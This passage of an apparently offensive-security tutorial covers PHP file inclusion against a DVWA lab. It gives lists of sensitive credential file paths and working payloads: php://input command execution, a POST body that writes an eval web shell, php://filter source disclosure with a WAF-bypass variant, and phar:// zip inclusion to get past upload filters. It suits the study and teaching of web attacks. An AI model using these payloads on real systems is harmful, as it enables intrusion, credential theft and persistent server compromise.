&lt;span class="nc"&gt;Warning&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;include&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nc"&gt;Failed&lt;/span&gt; &lt;span class="n"&gt;opening&lt;/span&gt; &lt;span class="s1"&gt;'http://192.168.1.4'&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nf"&gt;inclusion&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;include_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'.;C:\php\pear;../../external/phpids/0.6/lib/'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt; &lt;span class="nc"&gt;D&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="n"&gt;\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="mi"&gt;36&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmyzjntin2u8ktiu0j9e0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmyzjntin2u8ktiu0j9e0.png" alt=" " width="799" height="251"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After setting both configuration options back to &lt;code&gt;On&lt;/code&gt; and restarting the server, remote file inclusion works.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7t8skc4zgmyvz6o0t0ps.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7t8skc4zgmyvz6o0t0ps.png" alt=" " width="800" height="529"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Absolute Paths of Sensitive Files
&lt;/h3&gt;

&lt;p&gt;This article provides more detail: &lt;a href="https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o"&gt;Summary of Sensitive Directory Paths in Windows and Linux&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Below is a list of absolute paths for commonly used sensitive files:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Windows:&lt;/span&gt;
c:/boot.ini                                 &lt;span class="c"&gt;# View system version&lt;/span&gt;
c:/windows/php.ini                          &lt;span class="c"&gt;# PHP configuration&lt;/span&gt;
c:/windows/my.ini                           &lt;span class="c"&gt;# MySQL configuration (may contain credentials)&lt;/span&gt;
c:/winnt/php.ini
c:/winnt/my.ini
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\w&lt;/span&gt;&lt;span class="k"&gt;in&lt;/span&gt;.ini                          &lt;span class="c"&gt;# System configuration file&lt;/span&gt;
c:&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\d&lt;/span&gt;ata&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\u&lt;/span&gt;ser.MYD                &lt;span class="c"&gt;# MySQL user passwords&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\R&lt;/span&gt;hinoSoft.com&lt;span class="se"&gt;\S&lt;/span&gt;erv-U&lt;span class="se"&gt;\S&lt;/span&gt;ervUDaemon.ini   &lt;span class="c"&gt;# Virtual host paths and passwords&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\S&lt;/span&gt;erv-U&lt;span class="se"&gt;\S&lt;/span&gt;ervUDaemon.ini
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\s&lt;/span&gt;ystem32&lt;span class="se"&gt;\i&lt;/span&gt;netsrv&lt;span class="se"&gt;\M&lt;/span&gt;etaBase.xml    &lt;span class="c"&gt;# IIS virtual host configuration&lt;/span&gt;
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\r&lt;/span&gt;epair&lt;span class="se"&gt;\s&lt;/span&gt;am                       &lt;span class="c"&gt;# Windows initial installation password&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\S&lt;/span&gt;erv-U&lt;span class="se"&gt;\S&lt;/span&gt;ervUAdmin.exe      &lt;span class="c"&gt;# Serv-U admin password (pre-6.0)&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\R&lt;/span&gt;hinoSoft.com&lt;span class="se"&gt;\S&lt;/span&gt;ervUDaemon.exe
C:&lt;span class="se"&gt;\D&lt;/span&gt;ocuments and Settings&lt;span class="se"&gt;\A&lt;/span&gt;ll Users&lt;span class="se"&gt;\A&lt;/span&gt;pplication Data&lt;span class="se"&gt;\S&lt;/span&gt;ymantec&lt;span class="se"&gt;\p&lt;/span&gt;cAnywhere&lt;span class="se"&gt;\*&lt;/span&gt;.cif  &lt;span class="c"&gt;# pcAnywhere login passwords&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\A&lt;/span&gt;pache Group&lt;span class="se"&gt;\A&lt;/span&gt;pache&lt;span class="se"&gt;\c&lt;/span&gt;onf&lt;span class="se"&gt;\h&lt;/span&gt;ttpd.conf or C:&lt;span class="se"&gt;\a&lt;/span&gt;pache&lt;span class="se"&gt;\c&lt;/span&gt;onf&lt;span class="se"&gt;\h&lt;/span&gt;ttpd.conf  &lt;span class="c"&gt;# Apache configuration&lt;/span&gt;
c:/Resin-3.0.14/conf/resin.conf             &lt;span class="c"&gt;# Resin configuration (JSP)&lt;/span&gt;
c:/Resin/conf/resin.conf
/usr/local/resin/conf/resin.conf
d:&lt;span class="se"&gt;\A&lt;/span&gt;PACHE&lt;span class="se"&gt;\A&lt;/span&gt;pache2&lt;span class="se"&gt;\c&lt;/span&gt;onf&lt;span class="se"&gt;\h&lt;/span&gt;ttpd.conf
C:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\m&lt;/span&gt;y.ini
C:&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\d&lt;/span&gt;ata&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\u&lt;/span&gt;ser.MYD                &lt;span class="c"&gt;# MySQL user passwords&lt;/span&gt;

&lt;span class="c"&gt;# Linux/Unix:&lt;/span&gt;
/usr/local/app/apache2/conf/httpd.conf      &lt;span class="c"&gt;# Apache2 default configuration&lt;/span&gt;
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf  &lt;span class="c"&gt;# Virtual host settings&lt;/span&gt;
/usr/local/app/php5/lib/php.ini             &lt;span class="c"&gt;# PHP settings&lt;/span&gt;
/etc/sysconfig/iptables                     &lt;span class="c"&gt;# Firewall rules&lt;/span&gt;
/etc/httpd/conf/httpd.conf                  &lt;span class="c"&gt;# Apache configuration&lt;/span&gt;
/etc/rsyncd.conf                            &lt;span class="c"&gt;# rsync configuration&lt;/span&gt;
/etc/my.cnf                                 &lt;span class="c"&gt;# MySQL configuration&lt;/span&gt;
/etc/redhat-release                         &lt;span class="c"&gt;# System version&lt;/span&gt;
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
/etc/httpd/conf/httpd.conf or /usr/local/apche/conf/httpd.conf
/usr/local/resin-3.0.22/conf/resin.conf
/usr/local/resin-pro-3.0.22/conf/resin.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
/etc/sysconfig/iptables
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Inclusion Techniques
&lt;/h2&gt;

&lt;p&gt;The following examples use this test code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Default settings: &lt;code&gt;allow_url_fopen = On&lt;/code&gt;, &lt;code&gt;allow_url_include = Off&lt;/code&gt;. Special requirements are noted where applicable.&lt;/p&gt;

&lt;h3&gt;
  
  
  PHP Pseudo-Protocols
&lt;/h3&gt;

&lt;p&gt;PHP provides numerous built-in URL-style wrappers that can be used with filesystem functions such as &lt;code&gt;fopen()&lt;/code&gt;, &lt;code&gt;copy()&lt;/code&gt;, &lt;code&gt;file_exists()&lt;/code&gt;, and &lt;code&gt;filesize()&lt;/code&gt;. In addition, custom wrappers can be registered via &lt;code&gt;stream_wrapper_register()&lt;/code&gt;. PHP pseudo-protocols are supported protocols and wrappers (12 types):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight kotlin"&gt;&lt;code&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Access local filesystem&lt;/span&gt;
&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Access HTTP(s) URLs&lt;/span&gt;
&lt;span class="n"&gt;ftp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Access FTP(s) URLs&lt;/span&gt;
&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Access various I/O streams&lt;/span&gt;
&lt;span class="n"&gt;zlib&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Compression streams&lt;/span&gt;
&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Data (RFC 2397)&lt;/span&gt;
&lt;span class="n"&gt;glob&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Find matching file path patterns&lt;/span&gt;
&lt;span class="n"&gt;phar&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — PHP Archive&lt;/span&gt;
&lt;span class="n"&gt;ssh2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Secure Shell 2&lt;/span&gt;
&lt;span class="n"&gt;rar&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — RAR&lt;/span&gt;
&lt;span class="n"&gt;ogg&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Audio streams&lt;/span&gt;
&lt;span class="n"&gt;expect&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Process interactive streams&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  file://
&lt;/h4&gt;

&lt;p&gt;The &lt;code&gt;file://&lt;/code&gt; pseudo-protocol accesses local filesystem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nv"&gt;fileinclude&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;&lt;span class="nv"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;file:&lt;/span&gt;&lt;span class="sr"&gt;//&lt;/span&gt;&lt;span class="nv"&gt;C:&lt;/span&gt;&lt;span class="sr"&gt;/Windows/&lt;/span&gt;&lt;span class="nv"&gt;win&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;ini&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ag697e406g6yuuc1ei0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7ag697e406g6yuuc1ei0.png" alt=" " width="800" height="322"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  php://input
&lt;/h4&gt;

&lt;p&gt;Allows access to the raw request body as a read-only stream. It can read unparsed POST data. Ineffective when &lt;code&gt;enctype="multipart/form-data"&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;allow_url_include = On&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=php://input
# POST body:
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;phpinfo&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0uhfk9iah8vmqmreppt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi0uhfk9iah8vmqmreppt.png" alt=" " width="800" height="454"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h5&gt;
  
  
  Note: Bypassing &lt;code&gt;file_get_contents()&lt;/code&gt; with &lt;code&gt;php://input&lt;/code&gt;
&lt;/h5&gt;

&lt;p&gt;When encountering &lt;code&gt;file_get_contents()&lt;/code&gt;, consider using &lt;code&gt;php://input&lt;/code&gt; to bypass restrictions, as PHP pseudo-protocols can also handle HTTP, allowing POST data transfer.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;file_get_contents()&lt;/code&gt; returns the entire file content as a string. If a string is passed directly as a parameter, it may cause an error, but if the string contains an HTTP URL, it behaves like &lt;code&gt;curl&lt;/code&gt; and reads the source code. PHP pseudo-protocols recognise the HTTP protocol, so &lt;code&gt;php://input&lt;/code&gt; can read POST data to assign values to parameters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Test code:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="nb"&gt;file_get_contents&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"php://input"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Result:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6giqctq4cl9i7t31iiq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp6giqctq4cl9i7t31iiq.png" alt=" " width="799" height="319"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  php://input (Command Execution)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;allow_url_include = On&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=php://input
# POST body:
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'whoami'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5qke8uoppgrjr2qqn6xi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5qke8uoppgrjr2qqn6xi.png" alt=" " width="799" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  php://input (Writing a Trojan)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;allow_url_include = On&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;fileinclude.php?file=php://input
# POST body:
&lt;span class="nt"&gt;&amp;lt;&lt;/span&gt;&lt;span class="err"&gt;?&lt;/span&gt;&lt;span class="na"&gt;php&lt;/span&gt; &lt;span class="na"&gt;fputs&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="na"&gt;fopen&lt;/span&gt;&lt;span class="err"&gt;('&lt;/span&gt;&lt;span class="na"&gt;hack.php&lt;/span&gt;&lt;span class="err"&gt;','&lt;/span&gt;&lt;span class="na"&gt;w&lt;/span&gt;&lt;span class="err"&gt;'),'&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="o"&gt;@&lt;/span&gt;&lt;span class="k"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="err"&gt;');?&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After execution, the web shell is created in the same directory:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fga3vehsx4zzioic6wq4m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fga3vehsx4zzioic6wq4m.png" alt=" " width="721" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Using a shell management tool (e.g., AntSword), the connection succeeds.&lt;/p&gt;

&lt;h4&gt;
  
  
  php://filter
&lt;/h4&gt;

&lt;p&gt;A meta-wrapper designed for filtering applications when streams are opened. It reads and writes local disk files.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;php://filter/read&lt;span class="o"&gt;=&lt;/span&gt;convert.base64-encode/resource&lt;span class="o"&gt;=&lt;/span&gt;index.php
&lt;span class="c"&gt;# Alternative:&lt;/span&gt;
fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;php://filter/convert.base64-encode/resource&lt;span class="o"&gt;=&lt;/span&gt;index.php
&lt;span class="c"&gt;# (The second is shorter and may bypass some WAFs)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By specifying a file at the end, the source code (base64-encoded) can be read and then decoded. Although direct shell access may not be obtained, reading sensitive files is still harmful.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryxszy3lisu5ptc8w9yi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fryxszy3lisu5ptc8w9yi.png" alt=" " width="799" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The string &lt;code&gt;PD9waHAKZWNobyAiSGVsbG8gV29ybGQiOwo/Pg==&lt;/code&gt; decodes to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Hello World"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  phar://
&lt;/h4&gt;

&lt;p&gt;This pseudo-protocol extracts archive files. Regardless of the file extension, it is treated as a compressed archive.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;PHP version &amp;gt;= 5.3.0&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_include&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;No requirement for &lt;code&gt;allow_url_fopen&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Create a file &lt;code&gt;phpinfo.php&lt;/code&gt; with content &lt;code&gt;&amp;lt;?php phpinfo(); ?&amp;gt;&lt;/code&gt; and pack it into a ZIP archive:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9795lc6diut492bvy781.png" alt=" " width="800" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Specify the absolute path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phar://D:/phpStudy/PHPTutorial/WWW/test.zip/phpinfo.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or use a relative path (if &lt;code&gt;test.zip&lt;/code&gt; is in the same directory as &lt;code&gt;fileinclude.php&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phar://test.zip/phpinfo.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft63zlmspnmb3yacl6wol.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft63zlmspnmb3yacl6wol.png" alt=" " width="800" height="118"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;test.zip&lt;/code&gt; must be a ZIP archive; other formats (RAR, 7z) do not work. However, the file extension can be changed to e.g., &lt;code&gt;test.jpg&lt;/code&gt; or &lt;code&gt;test.111&lt;/code&gt;. This bypasses upload restrictions.&lt;/p&gt;

